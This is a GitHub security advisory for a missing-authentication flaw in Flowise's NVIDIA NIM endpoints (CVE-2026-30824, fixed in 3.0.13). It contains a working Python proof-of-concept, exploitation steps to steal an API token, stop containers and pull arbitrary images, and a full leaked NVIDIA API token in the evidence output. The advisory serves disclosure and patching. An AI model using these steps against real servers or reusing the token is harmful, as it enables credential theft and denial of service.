GHSA-5F53-522J-J454

Vulnerability from github – Published: 2026-03-06 22:21 – Updated: 2026-03-09 13:15
VLAI?
Summary
Flowise Missing Authentication on NVIDIA NIM Endpoints
Details

Missing Authentication on NVIDIA NIM Endpoints

Summary

The NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.

Vulnerability Details

Field Value
CWE CWE-306: Missing Authentication for Critical Function
Affected File packages/server/src/utils/constants.ts
Affected Line Line 20 ('/api/v1/nvidia-nim' in WHITELIST_URLS)
CVSS 3.1 8.6 (High)

Root Cause

In packages/server/src/utils/constants.ts, the NVIDIA NIM route is added to the authentication whitelist:

export const WHITELIST_URLS = [
    // ... other URLs
    '/api/v1/nvidia-nim',  // Line 20 - bypasses JWT/API-key validation
    // ...
]

This causes the global auth middleware to skip authentication checks for all endpoints under /api/v1/nvidia-nim/*. None of the controller actions in packages/server/src/controllers/nvidia-nim/index.ts perform their own authentication checks.

Affected Endpoints

Method Endpoint Risk
GET /api/v1/nvidia-nim/get-token Leaks valid NVIDIA API token
GET /api/v1/nvidia-nim/preload Resource consumption
GET /api/v1/nvidia-nim/download-installer Resource consumption
GET /api/v1/nvidia-nim/list-running-containers Information disclosure
POST /api/v1/nvidia-nim/pull-image Arbitrary image pull
POST /api/v1/nvidia-nim/start-container Arbitrary container start
POST /api/v1/nvidia-nim/stop-container Denial of Service
POST /api/v1/nvidia-nim/get-image Information disclosure
POST /api/v1/nvidia-nim/get-container Information disclosure

Impact

1. NVIDIA API Token Leakage

The /get-token endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models.

Token obtained:

{
  "access_token": "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",
  "token_type": "Bearer",
  "expires_in": 3600
}

Token validation:

curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
# Returns list of 170+ available models

2. Container Runtime Manipulation

On systems with Docker/NIM installed, an unauthenticated attacker can: - List running containers (reconnaissance) - Stop containers (Denial of Service) - Start containers with arbitrary images - Pull arbitrary Docker images (resource consumption, potential malicious images)

Proof of Concept

poc.py

#!/usr/bin/env python3
"""
POC: Privileged NVIDIA NIM endpoints are unauthenticated

Usage:
  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
"""

import argparse
import urllib.request
import urllib.error

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port")
    ap.add_argument("--path", required=True, help="NIM endpoint path")
    ap.add_argument("--method", default="GET", choices=["GET", "POST"])
    ap.add_argument("--data", default="", help="Raw request body for POST")
    args = ap.parse_args()

    url = args.target.rstrip("/") + "/" + args.path.lstrip("/")
    body = args.data.encode("utf-8") if args.method == "POST" else None
    req = urllib.request.Request(
        url,
        data=body,
        method=args.method,
        headers={"Content-Type": "application/json"} if body else {},
    )

    try:
        with urllib.request.urlopen(req, timeout=10) as r:
            print(r.read().decode("utf-8", errors="replace"))
    except urllib.error.HTTPError as e:
        print(e.read().decode("utf-8", errors="replace"))

if __name__ == "__main__":
    main()

screenshot

Exploitation Steps

# 1. Obtain NVIDIA API token (no authentication required)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token

# 2. List running containers
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers

# 3. Stop a container (DoS)
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \
  --method POST --data '{"containerId":"<target_id>"}'

# 4. Pull arbitrary image
python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \
  --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}'

Evidence

Token retrieval without authentication:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token
{"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null}

Token grants access to NVIDIA API:

$ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models
{"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]}

Container endpoints return 500 (not 401) proving auth bypass:

$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers
{"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}}

References

Severity ?
7.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.12"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.13"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30824"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-306"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-06T22:21:38Z",
    "nvd_published_at": "2026-03-07T06:16:10Z",
    "severity": "HIGH"
  },
  "details": "# Missing Authentication on NVIDIA NIM Endpoints\n\n## Summary\n\nThe NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints.\n\n## Vulnerability Details\n\n| Field | Value |\n|-------|-------|\n| CWE | CWE-306: Missing Authentication for Critical Function |\n| Affected File | `packages/server/src/utils/constants.ts` |\n| Affected Line | Line 20 (`\u0027/api/v1/nvidia-nim\u0027` in `WHITELIST_URLS`) |\n| CVSS 3.1 | 8.6 (High) |\n\n## Root Cause\n\nIn `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist:\n\n```typescript\nexport const WHITELIST_URLS = [\n    // ... other URLs\n    \u0027/api/v1/nvidia-nim\u0027,  // Line 20 - bypasses JWT/API-key validation\n    // ...\n]\n```\n\nThis causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks.\n\n## Affected Endpoints\n\n| Method | Endpoint | Risk |\n|--------|----------|------|\n| GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token |\n| GET | `/api/v1/nvidia-nim/preload` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption |\n| GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull |\n| POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start |\n| POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service |\n| POST | `/api/v1/nvidia-nim/get-image` | Information disclosure |\n| POST | `/api/v1/nvidia-nim/get-container` | Information disclosure |\n\n## Impact\n\n### 1. NVIDIA API Token Leakage\n\nThe `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA\u0027s inference API and can list 170+ LLM models.\n\n**Token obtained:**\n```json\n{\n  \"access_token\": \"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\",\n  \"token_type\": \"Bearer\",\n  \"expires_in\": 3600\n}\n```\n\n**Token validation:**\n```bash\ncurl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n# Returns list of 170+ available models\n```\n\n### 2. Container Runtime Manipulation\n\nOn systems with Docker/NIM installed, an unauthenticated attacker can:\n- List running containers (reconnaissance)\n- Stop containers (Denial of Service)\n- Start containers with arbitrary images\n- Pull arbitrary Docker images (resource consumption, potential malicious images)\n\n## Proof of Concept\n\n### poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nPOC: Privileged NVIDIA NIM endpoints are unauthenticated\n\nUsage:\n  python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\"\"\"\n\nimport argparse\nimport urllib.request\nimport urllib.error\n\ndef main():\n    ap = argparse.ArgumentParser()\n    ap.add_argument(\"--target\", required=True, help=\"Base URL, e.g. http://host:port\")\n    ap.add_argument(\"--path\", required=True, help=\"NIM endpoint path\")\n    ap.add_argument(\"--method\", default=\"GET\", choices=[\"GET\", \"POST\"])\n    ap.add_argument(\"--data\", default=\"\", help=\"Raw request body for POST\")\n    args = ap.parse_args()\n\n    url = args.target.rstrip(\"/\") + \"/\" + args.path.lstrip(\"/\")\n    body = args.data.encode(\"utf-8\") if args.method == \"POST\" else None\n    req = urllib.request.Request(\n        url,\n        data=body,\n        method=args.method,\n        headers={\"Content-Type\": \"application/json\"} if body else {},\n    )\n\n    try:\n        with urllib.request.urlopen(req, timeout=10) as r:\n            print(r.read().decode(\"utf-8\", errors=\"replace\"))\n    except urllib.error.HTTPError as e:\n        print(e.read().decode(\"utf-8\", errors=\"replace\"))\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\u003cimg width=\"1581\" height=\"595\" alt=\"screenshot\" src=\"https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989\" /\u003e\n\n### Exploitation Steps\n\n```bash\n# 1. Obtain NVIDIA API token (no authentication required)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n\n# 2. List running containers\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n\n# 3. Stop a container (DoS)\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \\\n  --method POST --data \u0027{\"containerId\":\"\u003ctarget_id\u003e\"}\u0027\n\n# 4. Pull arbitrary image\npython poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \\\n  --method POST --data \u0027{\"imageTag\":\"malicious/image\",\"apiKey\":\"any\"}\u0027\n```\n\n### Evidence\n\n**Token retrieval without authentication:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token\n{\"access_token\":\"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\",\"token_type\":\"Bearer\",\"refresh_token\":null,\"expires_in\":3600,\"id_token\":null}\n```\n\n**Token grants access to NVIDIA API:**\n```\n$ curl -H \"Authorization: Bearer nvapi-GT-...\" https://integrate.api.nvidia.com/v1/models\n{\"object\":\"list\",\"data\":[{\"id\":\"01-ai/yi-large\",...},{\"id\":\"meta/llama-3.1-405b-instruct\",...},...]}\n```\n\n**Container endpoints return 500 (not 401) proving auth bypass:**\n```\n$ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers\n{\"statusCode\":500,\"success\":false,\"message\":\"Container runtime client not available\",\"stack\":{}}\n```\n\n## References\n\n- [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html)\n- [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)",
  "id": "GHSA-5f53-522j-j454",
  "modified": "2026-03-09T13:15:54Z",
  "published": "2026-03-06T22:21:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-5f53-522j-j454"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30824"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.13"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Flowise Missing Authentication on NVIDIA NIM Endpoints"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.